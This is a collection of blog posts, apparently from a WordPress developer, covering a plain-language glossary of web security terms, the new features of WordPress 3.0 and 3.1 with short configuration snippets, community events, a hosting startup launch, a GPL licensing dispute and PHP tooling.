INFOSEC 101: Breaking Down Scary Terms and What They Mean

I am not a hacker. But I understand the information security world. It’s a scary place, unfortunately, to people who have no exposure to it. Yesterday, WordPress 3.0.4 was released as a critical release… and it was. Matt explained the reason for the release in this way:

Version 3.0.4 of WordPress…is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

Simple enough. He goes on to refer to the vulnerability as an XSS vulnerability which caused a bit of angst on Twitter about what that means and if non-technical users should be given more information due to the terminology.

So, as a public service, I give you some basic definitions and concepts of web security and what we mean. These concepts are rightly scary, but the names tend to be scarier to those who don’t understand them.

XSS

XSS means cross site scripting. Cross site scripting attacks are generally attacks that occur because something is injected into a URL or “event” on a site to make the site do something else. Do something else can mean “hijack” a site so all visitors are sent somewhere else, or special HTML is injected into a site (often in the form of hidden links that diminish Google search results for the site, etc). This was the nature of the vulnerability fixed in WordPress yesterday.

XSS attacks are almost always carried out because of JavaScript injection. WordPress does have security API that makes dangerous characters (that is, special characters that make JavaScript do things) and it is encouraged that all plugin and theme developers use these APIs. [Docs]

CSRF

CSRF means Cross Site Request Forgery. With CSRF attacks, browsers (and sometimes other things) are hijacked to “do” things to a website without a user knowing. It’s the proverbial trojan horse where there is an inherent trust from a site that the user/browser is doing something trusted and so attacks riding the coat tails of such trust are given the same trust that the user would also get.

A simple example (does not actually exist) would be that an authenticated user in WordPress with admin privileges is tricked into clicking a link (as the authenticated user) and then admin privileges are transferred to the attacker. We’ve seen this kind of attack on Facebook and Twitter before where DMs or messages are spread across Facebook walls or via Twitter DM).

SQL Injection

SQL Injection is an attack that, without going into the technical details, allows an attacker to send special queries to the database that can alter, modify or even delete a database altogether. You don’t see many of these anymore because most apps are built on frameworks or platforms (like WordPress or Drupal) that have built in routines and APIs that prevent this. In WordPress, there is a prepare() function in the database class which ensures that no SQL injection is possible.

0Day Vulnerabilities

0Day (that is Zero, not “Oh”) is a vulnerability that is exploited before it has been disclosed. Many security researchers work closely with web application developers to alert them to newly discovered vulnerabilities before they are publicly disclosed. They then work with the developers to close the hole before disclosing the vulnerability. The term 0Day comes from the idea that the web app developer knows about the exploit on the 0th day after public disclosure (it hasn’t been disclosed yet).

Denial of Service/(D)DoS

(D)DoS is a (Distributed) Denial of Service attack. These attacks are carried out by flooding a site with traffic/requests to the point where the site can no longer handle the traffic and collapses. If the attack comes from a single source, it’s a DoS but if it comes from more than one, it is a DDoS.

Obviously, there are many aspects of security. We could go way complicated on terminology and concepts, but these are some of the basics you should know when you see something about a vulnerability.

Photo Credit: heathbrandon

10 Things You Need to Know About WordPress 3.1

Happy New Year, everyone. WordPress development on version 3.1 is wrapping up (Currently it’s in Release Candidate and should be released early in 2011)…. which means, it’s time for another edition of our 10 Things You Need to Know About posts.

This is a bigger release than was originally planned. It was supposed to stay small and set the stage for a larger WordPress 3.2 release later in the year. That release will require PHP 5.2 (make sure your host supports it now… We do at WP Engine. WP 3.1 did turn into a larger release than expected, but I think you’ll be happy. So without further adieu.

Network Admin

if you’re running WordPress in Multisite mode, or have used WordPress MU for a while, you may find yourself alarmed by the conspicuous lack of a Site Admin/Super Admin menu that has been situated at the top of the Admin menu. Never fear, though it looks like this has gone the way of the dodo, in fact it has been relocated into a separate dashboard area accessible from the new “Network Admin” in the top right of the WordPress Admin. Notably, when you click on this link, you are taken to a new dashboard for Network management (and that link then changes to Site Admin to allow quick access back into the normal WordPress admin. Also note that, like the previous Super Admin menu, this link is only viewable (and by proxy, accessible) to users who have been designated as Super Admins. This change allows for additional separation of content production and administration and allows for blogs (Sites) to be managed individually and the Network to be managed separately.

Post Formats

Perhaps one of the most talked about features in WordPress 3.1 are post formats. Post formats have been implemented in a variety of ways for years. The idea that some content is different (and should be rendered differently as a result) has gone way back. A prime example of this was the concept of “Asides” – or little blurbs that were often simply links or short posts that were off topic, not really worth a full blog post or whatever. Now, with a bit of code in a theme functions.php, you can enable any number of 9 different formats: aside, chat, gallery, link, image, quote, status, video, or audio.

In this paradigm, theme developers can target specific CSS and layout structure to each of these post formats. This enables rich user experience and high quality layout without prejudice toward the most common type of content… text. If you aren’t sure what each of these types of content are, I refer you to the Post Formats section of the Codex which has a list.

In order to enable a theme with one or more of these formats, add the following line to the theme functions.php file:

1
add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );

This line enables new UI in the post edit
screen that allows for you to designate a post with a specified format. For a thorough write-up on this new feature, go read the post format reference from my friend Lisa Sabin-Wilson.

Internal Linking

Have you ever gone through the torturous process of adding links to your own site to a post you’re writing? You have to go find that post from a different tab or window, usually via search or scrolling through potentially pages of content to find exactly what you want? Yeah? Me too. As a result, WordPress has added Internal Linking as a feature to WordPress 3.1.

This feature, only available when using the Visual Text Editor, allows you to add a link as you always have, or choose from already existing content on the same page. Yeah… that easy. Simply click the typical link button, then click on the arrow to
expand the “Link to Existing Content” section of the pop-up window. Pretty neat!

Import Overhaul

In advance of WordPress 3.2 and PHP5 dependence, we see yet another improvement that rewards WordPress users who utilize hosts using PHP5. The import routine has been rewritten from the ground up with efficiency in mind. While the old importer used regular expressions to parse through the WordPress export file (XML), this caused really bad efficiency problems.

Now, using native XML parsers, the WordPress import can process files much more efficiently. Additionally, similar to the file system transport API that is used by the one click installer and upgrade routines, WordPress goes through a series of checks to find the best method for XML parsing available on the server, thus a progressive enhancement for PHP 5. The first check is for SimpleXML (PHP5-only) followed by XML Parser (used in PHP 4) and, if neither of those two libraries are enabled, it falls back on the old, antiquated regex parsing.

Editorial Comment: I was hoping for a rewrite for 3.2 to both the exporter and importer that would handle everything in JSON (a much more lightweight plain text file format), perhaps optionally, instead of XML. XML parsing by nature, regardless of SimpleXML or XML Parser, is quite expensive in terms of CPU cycles and efficiency.

Theme Filter

WordPress.com users are probably familiar with the theme filter that those bloggers have had access to. With Theme Filters, users are able to quickly drill down on possible themes to install and use based on criteria such as number of columns, features, etc. To access this, simply click on the Feature Filter on the right side of the themes page to display all the options that are available. Note for Theme Developers: In order to make this useful for bloggers, please ensure that your theme style sheet headers include a Tags header similar to this:

1
Tags: white, yellow, light, one-column, two-columns, fixed-width, custom-colors, custom-header, custom-background

Advanced Taxonomy and Postmeta Queries

WordPress wouldn’t be complete without enhancements for developers as well. In WordPress 3.1, developers have access to powerful new features that provide for robust querying of both taxonomies and postmeta. In previous iterations, developers could target posts with WP_Query (or the Loop) to only those posts that have meta_key=foo or meta_value=bar.

The problem was, the potential for more granular targeting (i.e. get only posts with meta_key=foo AND meta_key=bar AND published BETWEEN Jan 1 of 2007 and Jan 31 of 2002) was not possible. Now it is. Replace meta_key and meta_value with meta_query and feed it in an array of arrays that contain any of key, value, compare (comparison operator) and type (data type). This will cause the query to automatically drill down with more granularity on the content requested.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$query = new WP_Query( array(
'meta_query' => array(
array(
'key' => 'foo',
'value' => 123,
'compare' => '>=',
'type' => 'numeric'
),
array(
'key' => 'foo2',
'value' => array( 'bar2', 'bar3' ),
'compare' => 'IN',
),
)
) );

The same can be done with taxonomy queries. Instead of meta_query, however, use tax_query and instead of key, value, compare and type you would use taxonomy, terms, field and operator. Otto has a good explanation for that on his site.

User Queries Overhauled and Simplified

Anyone who has done plugin development that has needed access to users have had a hodge podge of functions like get_userdatabylogin(), get_user_by_email(), etc. Not a lot of consistency, and definitely something that required frequent referencing of code. Now, from the “Duh! Why Didn’t I think of that?” file, comes the get_users() function that simplifies that API. It also wraps around a more powerful class for user search and querying called WP_User_Query.

To leverage this new API, you simply pass an array to get_users() and it returns an object based on the dataset retrieved. Arguments in the passed array can be:

  • blog_id – defaults to the blog id of the current blog (always 1 when WordPress is in standard mode but maybe another number in Multisite mode.
  • role – administrator, author, editor, subscriber, contributor. Defaults to nothing.
  • meta_key – allows for usermeta comparison and defaults to nothing.
  • meta_value – allows for usermeta comparison and defaults to nothing.
  • meta_compare – allows for usermeta comparison and defaults to nothing.
  • include – an array of user IDs to search. If empty, it searches all users. By default, it’s empty.
  • exclude – similar to include, this is an array of user IDs to not search. By default, it’s empty.
  • search – provides a way to target how columns are targeted. If, for instance, *max* is passed, wildcard searching is done in user_login, user_email, etc. By default, it’s empty.
  • orderby – specifies which column the results should be sorted on. By default, it is ‘login’ which designates the user_login column.
  • order – ASC or DESC. By default, queries are returned in ASC order.
  • offset – Designates a number of records to offset in the resulting dataset. If set to 1, for instance, the data will be returned with the first record skipped and begin on the second. By default, this is empty.
  • number – Designates how many records to return.
  • count_total – if set to true, the number of records returned is included in the dataset. By default, this is set to true.
  • fields – designates which fields to search. By default, this is set to ‘all’

Admin Bar

For those of you who have been WordPress.com or BuddyPress users, you’ll be familiar with the admin bar. The Admin bar is a toolbar that goes across the top of the site that allows users quick access to other parts of their blogs. That Admin Bar has now been brought to WordPress 3.1 as a user setting so it can be turned on or off based on preference
in your user profile.

In Multisite, the default is to show the admin bar in both the wp-admin as well as on the front end. In standard mode, the admin bar is set to only display on the front end by default. The Admin Bar, by default, provides quick access to a User menu providing a quick link to the user profile as well as the dashboard and the ability to logout. There is also a My Sites drop down menu available in Multisite that allows users quick access to blogs they have access to. There is also Admin Bar access to other frequently used areas of the blog and plenty of hooks and filters for plugin developers to add additional access.

Improvements to Custom Post Types

In WordPress 3.0, custom post types were introduced and now they have been iterated on. For one, in WordPress 3.0, custom post types could be declared but a standard set of UI was added to the admin menu. This set of UI was fashioned with an edit menu (called Posts for the standard Posts UI), Add New and, if custom taxonomies were assigned, Categories and Tags (or
whatever those taxonomies were designated as).

Now, developers can add a show_in_menu argument when registering a post type, and designate which menu to display limited UI in. This allows for custom post types to be used with the flexibility of eliminating potentially unwanted UI that would clutter the menu. Andrew Nacin has a great writeup on admin menu changes with post types that is worth the read for any developer working in this area.

Related, when declaring a post type, you have traditionally had to pass an array of labels that designate a singular version of a name (i.e. Post vs Posts) as well as a common name (i.e. Posts). You can now add menu_name to that list of labels if you want to target a specific way of displaying the post type in the admin menu.

Finally, theme developers can now create template files named archive-{post_type}.php to target specific post types to specific templates. Utilize a new has_archive() function to determine what should be displayed when there are actually posts that match the criteria of the query or not. This gives a good way of providing some kind of 404ish or other content if no content for the post type exists.

Filterable Template Hierarchy

Speaking of template files, it’s now possible to designate different template file orders and hierarchy depending on need. The original ticket, patches and ultimate core addition, uses the following example:

Take the author template hierarchy: author-{nicename}.php > author-{id}.php > author.php

Say I want to add author-{role}.php before author.php.

With an ‘author_template_candidates’ hook, I could manipulate the actual hierarchy.

Thus was born the ‘{$type}_template_hierarchy’ filter which can be used by developers to insert author-{login} before author.php in the hierarchy by hooking on the filter ‘author_template_hierarchy’. Pretty Neat!

Conclusion

While WordPress 3.1 is not the biggest release in the history of WordPress major releases, it does add quite a few new toys for bloggers, as well as developers. Remember when upgrading that you should, if you can, test your site in a development area before doing the upgrade. Plugins should most likely work, but you never know. And if something is broke, you can email me a aaron@technosailor.com and, for a fee, I may be able to help you out.

Finally, the second edition of the WordPress Bible will be out sometime this spring and it does, in fact, cover WordPress 3.1. However, the 1st edition is available now and is a great resource if you’re trying to get under the hood. You can buy that today on Amazon.

Credit: Andrew Nacin (@nacin), a Core WordPress Developer, slapped me with a trout several times during the course of writing this article. While I take credit for the article, any inaccuracies are entirely his fault. ;-) #blamenacin

WordCamp Mid-Atlantic: Where It’s Been, Where It’s Going

Late in 2008, while I was transitioning from life in Baltimore to life outside of Washington, D.C., I was contemplating organizing the first WordCamp event in that area. Baltimore had begun to show signs of a healthy tech community and Washington had continued to flourish as a healthy communications scene. Philadelphia, just up I-95, had a healthy design and development community and I had become somewhat familiar with that city as well.

I made a point of making my event one that would set trends and challenge the status quo.

Mid-Atlantic

One thing I did think of early on was that I detested the trend that identified an event with a singular city, especially when there were multiple cities, all offering different, yet complementary modus operandi. I bucked the trend of identifying the event by a city, eschewing names like WordCamp DC or WordCamp Baltimore. These names, while celebratory of the city that hosts them, inherently bear the problem of inferred exclusivity.

From the very first WordCamp in the region, I challenged that designation and attempted to bring the cities together. It was called WordCamp Mid-Atlantic.

Three Cities, then Two

The original plan was to bring the three cities together in Baltimore for a WordPress event. Ideally, the result would be more collaboration and resources shared between the various communities. Ultimately, Philadelphia never bought into Mid-Atlantic (and in fact, ended up with their own successful WordCamp Philly). However, Mid-Atlantic was wildly supported by both Baltimore and DC. even garnering coverage in the Baltimore Sun business publication Maryland Daily Record.

For WordCamp Mid-Atlantic 2010, the event was geared mainly to the Washington Metro and Baltimore.

Keynotes That Challenge

In both events, I wanted to bring in someone from the WordPress leadership hierarchy as a Keynote as well as someone from outside of WordPress entirely to challenge the gathered attendees. This as quite controversial, actually. In 2009, I brought in Anil Dash, founder and former SVP at SixApart. Anil was known historically as somewhat of an antagonist, but did a wonderful job in sharing and illustrating the similarities between WordPress and SixApart who provided a competing platform. His message was one of learning from each other.

This past year, I opted to bring in Marco Tabini who has also been a frequent antagonist of WordPress. His message was one from the perspective of the PHP community and reconciling how the PHP core people could learn and help the WordPress core people, and vica versa. My inbox became a little tense in the weeks leading up to the event due to other incidents involving dissenting views about the GPL license and WordPress’ interpretation of it. Needless to say, Marco did an amazing job.

It’s Not My Baby

As most of you know, I have left the Baltimore/Washington region. As a result, this past WordCamp Mid-Atlantic was my last. People have asked me quite a lot about who I would pass the baton to. This is a tricky question because the event is not mine. It’s yours.

That said, this is not for just anyone to run. I cannot put any strings on who will run the next event but I do have the platform to voice my sentiments:

  • I want to see Mid-Atlantic stay in the event. I do not want to see a fractured event where there becomes a WordCamp Baltimore and a WordCamp DC. Both cities have user groups that meet frequently. I want to see the WordCamp Mid-Atlantic event retain it’s place as a regional/local event.
  • I want to see the idea of challenging (and even dissenting) opinions welcomed to the stage, like Marco… and Anil. We should not be scared of being shaken up. We should embrace it and learn from it. That said, future organizers should be sensitive as to who you have come and speak.
  • Retain the unconference. One of the amazing success stories of WordCamp Mid-Atlantic 2010 was the unconference, organized by Steve Fisher. Besides the pre-scheduled and organized tracks that are familiar to conference goers, we provided a separate, yet equal unconference for ad-hoc discussion and talks. The only thing I’d change is to make it true barcamp style and make a no-powerpoint rule.
  • No one organizer. I became the defacto organizer for both events. While I had varying degrees of help for both, I really became the guy for the event. This was not wise on my part. There should be an organizer in each city.

This is Baltimore’s event. This is Washington’s event. This event brilliantly integrated both communities. It really, really did. I want to see it continue (obviously with new leadership), but I want it to be with people who take it seriously and can make it better than it ever was. Put your own spin on it. Make it your own, not mine.

Back in Startup Mode… Announcing WP Engine!

Since I moved to Austin, I have been very coy about what I’ve been up to. There’s a reason for that and today I can tell you all about it. Especially since my good friend Marshall over at ReadWriteWeb already has. :-)

It was very interesting. Back in May, my friend Pete Jackson, who works for Intridea, started making a point of introducing me over to Twitter to one of his friends in whatever city I happened to be travelling in at that moment.

It was in this way that I met Sean Cook, the manager of mobile integrations at Twitter in San Francisco and, when I was in Austin visiting in May, he made sure that I met Aaron Scruggs of Other Inbox who has since become a pretty good friend.

It was after that meeting with Scruggs in May that he connected me to one of the smartest guys I’ve ever met, Jason Cohen. Jason is one of the two founding partners at Capital Thought, an Austin-based incubator. Jason has also built several companies and parlayed two of those into healthy exits. I’ve come to have a tremendous amount of respect for his technical and business savvy.

Jason described to me the concept for a business that he was working on along with Cullen Wilson. A premium, WordPress platform that would cater specifically to the customers who want to make sure their blog is always taken care of from a maintenance and upgrade perspective, but also would offer significant value adds that nobody else is providing in a WordPress-optimized environment.

I’ll get to what all those buzzwords mean in a minute. Stick with me.

We started talking about me joining up with them to take this idea to the bank. Shortly after moving down here to Austin, I joined the team and we’ve been working hard over the last couple months to get to the point where we could reliably take on new customers and talk about our idea publicly.

Today is that day.

So, you’re still probably wondering what the hell WP Engine is and why it’s important, right?

Let’s talk security for a minute. There have been significant security “incidents” in recent months. Most people on the outside simply see “WordPress hacked! WordPress hacked!” – I’m looking at you Chris Brogan, Robert Scoble and Frank Gruber (Techcocktail). In the WordPress community, we know the real issues in these cases were not WordPress but the hosts that the blogs were on. Still, people saw WordPress hacked.

We take this very seriously and have partnered with a provider that has multiple levels of security including Intrusion Detection Systems (IDS) outside of our boxes. We have gone to great lengths to keep our customers connecting to us in very secure ways and keep a close eye on the activity happening on our boxes. This is all very important because if an attacker could get through our outside defenses, chances are they couldn’t do anything malicious without us knowing about it.

Our infrastructure is also built with optimization and blazing, fast speed as a core expectation and deliverable. We don’t overload servers and have the means to see potential performance problems before they arrive. With our dual nginx-apache server configuration, we are able to handle sustained high-volume traffic as well as spikes that are the pain point for WordPress bloggers who suddenly get a story featured on a prominent site.

For the people who claim WordPress doesn’t scale… I call bullshit. We believe we know exactly how to make WordPress scale.

But we’re not just a hosting company. If we were that, we would be our competitors. We are also working on additional features such as “Curated Plugins” which are plugins that are entirely open source, that are popular or in demand from our customers and have been vetted from a security standpoint. These are plugins that we support 100%. This does not preclude customers from using other non-supported plugins, and we don’t dictate what bloggers can have on their blog as some of the other hosted WordPress solutions do. We just say, “Hey, if you use one of these, we’re gonna have your back”.

Other things that make WP Engine different:

  • 3 Smart guys supporting customers personally
  • A “Staging” area for one-click deployments and testing
  • We give back to the community. In fact, I made sure that I could work on the WordPress open source project, write the second edition of my book, and that much of our work will be returned to the community. Code is a commodity. The people and service behind the code is not.

We are not perfect yet, nor do we claim to be. We are a young company and have hundreds of things still to do and hopefully learn from. We are in an “invite only” mode at this time as much of the stuff we are doing and want to do is still not ready. But we are open for business and taking customers. And for $50/mo 1 for a dedicated WordPress environment that has optimization, speed and security plus the flexibility of you doing your own thing with a safety net… it’s a steal, really.

Photo used with permission by Donncha O Caoimh

Notes:

  1. For most customers

Impending Legal Precedent for GPL Licensing?

If you pay attention to the WordPress world, you might be aware that a landmark lawsuit is likely to be filed. I say landmark expecting that both sides will litigate and not settle – something that is desperately needed in the United States to validate and uphold the scope of the GPL license.

WordPress is a free software that is licensed under GPLv2 – a license that was created in 1991 to protect the ability of developers and users to gain access to software, create derivative works and distribute the copyrighted code in its entirety under the same protective license.

One of the tenants of the GPL that is argued prolifically is that derivative works are works that “link” into other works via APIs and dependencies (such as library dependencies). According to the argument, software that is considered a derivative work must retain the same licensing as the GPL’d work that it links into.

There are many legal (and non-legal) minds who would like to interpret this license in a variety of ways. There have been notable legal cases around the GPL in the United States, but all (to the best of my knowledge) have settled prior to litigation. One of these cases, Progress Software v MySQL AB, revolved around a product called Nusphere that was bundled with MySQL but was proprietary and incompatible with the GPL. The judge refused to grant summary judgement and eventually MySQL simply did not bundle the proprietary software.

Another case avoided judicial decision – and thus avoided judicial precedence. That case, Free Software Foundation v. Cisco, was settled out of court with a donation from Cisco and a pledge of commitment to the GPL.

Today, a major incident happened that has been brewing for years now. Due to an unfortunate incident which involved source code for the popular Thesis theme for WordPress (from DIYThemes) becoming compromised by a hacker, tempers started boiling over. Matt Mullenweg, founder of WordPress and the public face of )Automattic, the largest company behind the WordPress project, ended up on a live interview alongside Chris Pearson of DIYThemes.

Matt suggests (I think accurately) that a theme that is provided for WordPress (it does not work without WordPress) is a derivative work and requires GPL compatibility. He also suggests (accurately, I think) that GPL compliance would only enhance DIYTheme’s business as evidenced by countless other proprietary software providers who have gone open source.

Not to mention that a license does insinuate adherence to legal requirements provided by the license. If you don’t agree to the terms of the license, you’re not permitted to use the software. Makes sense.

Chris’ defense is that Thesis is completely independent of WordPress (which I question the rationality of since the software cannot exist absent of WordPress). He believes he has a business and economic right to maintain a license that is at odds with WordPress’ GPL license.

So my editorial question is… compliance with the WordPress GPL license is optional but compliance with the Thesis license is not? Hmmm.

Matt, in so many words, has already indicated that there will be a lawsuit that comes out of this. This could be landmark as, if the suit were not settled, it could define the parameters of open source software creation, usage and distribution reaching into every aspect of our life. Who uses Firefox? Yeah… depending on the outcome, that could be affected.

In a perfect world, the two sides reach an amicable solution. Thesis is popular, but it is not the only game in town. However, the second best solution is a legal precedent governing GPL software.

So we stand by and wait.

Image by Joe Gratz

10 Things You Need to Know About WordPress 3.0

By now, you’ve probably heard the hype about WordPress 3.0. You may have even seen the WordPress 3.0 preview webinar I did not too long ago.

This is somewhat of an odd release as I can’t point to 10 individual new features in WordPress. However, I can point to several very large new features that have been hyped enough already. Inside each of these new major things, there are several components. So, let me break the ten things down into three groups. We’re a little behind schedule (thanks to Jane Wells’ cat below) but I think the wait is worth it.

The Merge! WordPress and WordPress Multisite Together At Last

Back at WordCamp San Francisco last year (which is happening this weekend and I will be at), Matt Mullenweg announced that WordPress and WordPress MU would be merging into one singular software package. I covered that shortly after the announcement. The reasoning was that all of the WordPress core was already in sync with WordPress MU and MU simply had a bit more functionality added to it. Most of the code is the same. Why split resources and developers?

WordPress 3.0 is where this merge takes place.

Language Changes

While this is not a new feature in WordPress, existing WordPress MU users may find themselves “thrown” by new terminology involved in WordPress 3.0. In WordPress MU, we had the concept of a “Site” which was an installation of WordPress MU. Within a Site you could have one or more blogs.

In WordPress 3.0, we have the concept of a Network (which was a Site in WordPress MU) and under a Network, we have Sites (which were Blogs). Sites are Blogs. Networks are Sites. Site Admins in WordPress MU are now called Super Admin’s in WordPress 3.0. Making things complicated, we don’t call it WordPress MU anymore. We call it putting WordPress into Multisite mode. Complicated, eh? New WordPress Core Developer, Andrew Nacin, describes this terminology nightmare.

Enabling WordPress for Multisite Mode

Something that is bound to be confusing for users who expect to simply install WordPress and get all the benefits of Multisite out of the gate are bound to be confused by the fact that there is no apparent “switch” to turn it on. When you install WordPress 3.0, it will be in standard WordPress mode. In order to flip the switch, you have to add a new constant to your wp-config.php file. It’s easy, just add the following and save:

define('WP_ALLOW_MULTISITE',true);

Once this is done, you’ll find a new menu item called “Network”  in your Admin under Tools. Visit this page, enable Multisite and follow the instructions. You may need to add new configuration settings to your .htaccess file and wp-config.php, but WordPress will provide these lines for you to copy and paste.

Note: As with WordPress MU, you may need to make server level system changes to enable WordPress to handle subdomains. This is not an easily solved problem and caused heartburn with MU users and will likely continue to cause heartburn with WordPress 3.0 users as well.

Upgrading from WordPress or WordPress MU 2.9 or below

A lot of people, including myself, were concerned about upgrade paths when the Merge was announced. I should have known not to be concerned. WordPress has taken great care for years to ensure backwards compatibility and we’ve done the same thing here. If you’re on WordPress or WordPress MU, you will be able to install WordPress 3.0 and upgrade seamlessly. WordPress MU installs will become WordPress 3.0 with Multisite enabled and single installs of WordPress will retain all the benefits of standard installs of WordPress.

WordPress as a CMS: Custom Post Types and Taxonomies

Developers are already very excited about the new APIs available in WordPress 3.0. Specifically, Custom Post Types (which received initial support in WordPress 2.9). This is a very important set of new features because it finally – finally! – brings CMS support to WordPress. For the first time, we don’t have to simply pretend that WordPress is a CMS…. it can have all the CMS qualities of a Drupal or Joomla.

Custom Post Types

We initially talked about custom post types in WordPress 2.9 but in WordPress 3.0, the feature is fully vetted and able to be utilized. With a simple function in a plugin or theme, developers can create new post types (such as film reviews, podcasts or FAQs), provide entirely familiar UI (similar to posts and pages), etc.

You can find all the possible options under register_post_type() in the wp-includes/post.php file.

Custom Taxonomies

Going hand in hand with custom post types, you can also create custom taxonomies. Taxonomies are bits of metadata and most people think of them in terms of ‘categories’ and ‘tags’. Built into WordPress already are three taxonomies – categories, tags and link categories (which most people think about). The difference, from a technical perspective, between tags and categories is hierarchy. Categories have hierarchy so a category can have a child category, etc. Tags are flat and have no hierarchy.

You can create custom taxonomies with the register_taxonomy() function which will create UI automatically. All the options for custom taxonomies can be found in the wp-includes/taxonomy.php file.

Note: I have created a plugin and made it available for download that demonstrates how to use custom taxonomies and post types.

User Facing Enhancements

There are two major user facing enhancements. When I say two major user facing enhancements, I’m not being sensational. These things are killer and I think you’ll be excited.

Menus

Wow, this has been a controversial new feature. Mostly because it almost didn’t make it into WordPress 3.0 and users have really, really wanted it. Those familiar with the navigation creator in many of the WooThemes will be familiar with the new Menus feature in WordPress. This is because we worked early on with Woo to adopt their premium theme feature, which was very good, into the WordPress core (a fantastic case study on how premium theme developers can work directly with the WordPress core team).

The idea is really simple: Compose any menu with any hierarchy out of category archives, pages and custom links. Once a menu is created and saved, theme developers can enable support for this feature with the following line:

enable_theme_support('nav-menus');

Dropdowns are automatically created and semantic CSS markup allows style modifications easily. You can also create multiple menus (let’s say, a secondary navigation piece) and use them as sidebar widgets or hardcode them directly into a theme.

Default theme… no, no default theme… no, new default theme!

Well, you know all those free themes over on the theme repository? Yeah, most of theme are heavily modified versions of Kubrick, the default theme for WordPress. Theme people would take the code base, modify it and make it their own. They might upload it to the theme repository. Problem is, they would not be updated with the new stuff that would go into Kubrick. That and Kubrick sucked as a theme.

Well, as of WordPress 3.0, there is no more Kubrick. There also is no more Classic theme. Now, we have a new theme called twentyten. Yes, that means next year, we’ll have twentyeleven.

Twentyten is a very complex theme. It should not just be duplicated and hacked up. We want themers to adopt the child theme method of doing things. This is important because as changes go into twentyten, your child theme will inherit those changes.  Here’s a good starter for how to build child themes.

Note: If you are upgrading from previous versions of WordPress and have a child theme based on Kubrick, don’t delete the default theme. If you do, you can still grab the theme from the theme repository.

WordPress Admin Enhancements

The WordPress Administrative interface has also seen enhancements. Jane Wells is our usability expert in the WordPress developers group and has done quite a lot of work. Minor enhancements include an all light-grey style color scheme (as opposed to the dark grey header bar). This does seem to be better on the eyes. Additionally, the themes interface also has a new “tabbed” interface.

Custom Backgrounds

Built into twentyten is a new custom background feature. The cool thing is, theme developers can include this feature in their own theme. Simply adding this function to your theme functions.php will add a new menu item to your Appearance menu that allows for quick modification of the background image on the blog.

add_custom_background();

The Extras

Of course, not everything can fit into the three main areas of feature adds. Some are important and just don’t fit anywhere else.

Admin Username

Many of the security problems that have occurred in WordPress’ history have been a result of the administrative username being admin. This has not been selectable or changeable without hacking the database and changing the admin username there.

In WordPress 3.0, the username can now be selected on install. Here’s a hint…. don’t name it admin. :)

For a complete list of expected changes, see this Codex page.

WordPress 3.0 Preview Webinar

Yesterday, the iThemes folks graciously hosted me for a webinar. I had the opportunity to demonstrate some of the more anticipated features of WordPress 3.0 (due out next month). In the process, I also expressed some of the philosophies in the WordPress community around contributing and shaping the most popular publishing platform on the web.

Some of my answers to questions late in the webinar are directed specifically toward the fringe elements of the community who approach the project from a combative perspective choosing to take pot shots at people and Automattic specifically while never doing a damn thing to push the platform forward. While I’ve left names out of the webinar and this post, the message is clear: if you want to have credibility in the community, learn how to be constructive and own the features and elements you want to see.

But the webinar was not a political statement. In fact, most of it was a hands on demonstration of the new twentyten default theme in WordPress 3.0, the custom taxonomy and post type features which bring WordPress into approximate parity with other content management systems, as well as a preview of “The Merge” – the combination of WordPress MU and WordPress.

Thanks again to the folks over at iThemes. If you missed the Webinar, here it is. Sorry, iPhone and iPad users…. it’s Flash. ;)

WordPress 3.0 Preview with Aaron Brazell from WebDesign.com on Vimeo.

Battle of the Titans: Premium Theme Framework Smackdown

I have provided updates for the problems reported with each theme on their pages in this report. We can provide one update per framework as long as something significant has changed (as in a new release of the theme).

For a few days now, I’ve been looking closely at the four major theme frameworks. There are many premium themes. I, in fact, for the time, am using one from Woo Themes that I’ve modified to fit here. However, there are only four that I see as worthy competitors among the elite theme frameworks.

I will be using affiliate links when referencing all of them just because, if you choose to use any of them based on this article, I don’t mind collecting a commission fee. This does not indicate my endorsement of any of them. In fact, quite the opposite. I expect you’ll find me to be a hard, but objective critic of all of them.

The four theme frameworks: Thesis 1.7, Headway 1.6.1, Genesis 1.1.1, and Builder 2.3.11.

Report Scope and Prism

When I went about gathering data on this post, I heard a lot of back and forth from those in the WordPress community about why they liked or disliked each of these themes. Some of the issues were restrictive licensing that flies in the face of the open society that is WordPress. Other things were lingering effects from the Great Premium Theme Pissing Matches™ of 2008. Still others were about how user-friendly the themes were for users. In this report, I put all of that aside and look strictly from the perspective of infrastructure, data, security and WordPress core feature support.

All metrics that have been taken were created equally via a local installation of WordPress (eliminating network latency), with no plugins installed, 10,000 blog posts and 10,000 pages. The data points were taken in the context of a stress test and may or may not reflect actual usage. However, large scale stress is something to be concerned with for any site that is large or plans to become large. How the server handles database transactions, and file load is an integral part of a long term strategy. Each theme was deployed with no configuration changes beyond default settings provided by the theme. The results are fascinating.

This is a seven page article so click through to each new page to read the analysis of each theme.

Photo by icantcu

HipHop, PHP, and the Evolution of Language

A lively little discussion developed over the past few days on the DC-PHP developers mailing list. We have a very active developers group here in the DC area – much larger than most cities, in fact. Part of what makes our group great is the diversity of background and experience that is in the group.

This was front and center over the past few days when one of our members, Hans, offered his opinions on Facebook’s new HipHop for PHP product. We have already expressed our intent to help make WordPress compliant with HipHop, something that will be beneficial to major WordPress sites like TechCrunch, Mashable, VentureBeat, WordPress.com, the NFL Blogs, the NY Times blogs, the Cheezeburger network (LOLcats, FAILBlog, etc) that carry large amounts of traffic. I hope to be able to consult with some of these organizations on moving into a HipHop system once my head is wrapped around it and WordPress is compliant.

Photo by Josh Hunter
Photo by Josh Hunter

Hans is an extraordinary developer. I have never met him personally, but his depth of knowledge on issues of security and scalability is downright frightening. He offered his own opinion of HipHop on the mailing list and so I’m going to pick on him a bit:

This HipHop thing is interesting, perhaps in much the same way as HipHop music: it feels like a hack. — And I mean that respectfully in both cases; I like hip-hop music, and appreciate how it pays homage to R&B roots, remixing/reinterpreting them, etc; and I think that the idea of taking one language and building it out to something else is also something I should support. After all, I’ve embroiled myself in code generation tools (e.g. Propel) that are operating on the same philosophical groundwork. But I also believe that there’s a general rule like “if you need code generation, there’s something wrong [in your design or in the tools you’ve chosen or …]” … so those tools also feel like hacks.

In all of life, there is an evolution that happens. One iteration of something becomes better with improvements over time. This has happened on a micro level inside PHP. Without PHP 3 there would be no PHP 4. Without PHP 4, there would be no PHP 5. Ben Ramsey talked about this evolution before Christmas.

Why is it a hack to improve upon the tools used with a language? Is it a hack to use Memcached with PHP? Is it a hack to run on nginx instead of Apache or to implement FastCGI? All of these are third party software or extensions outside of PHP. So how is HipHop any different?

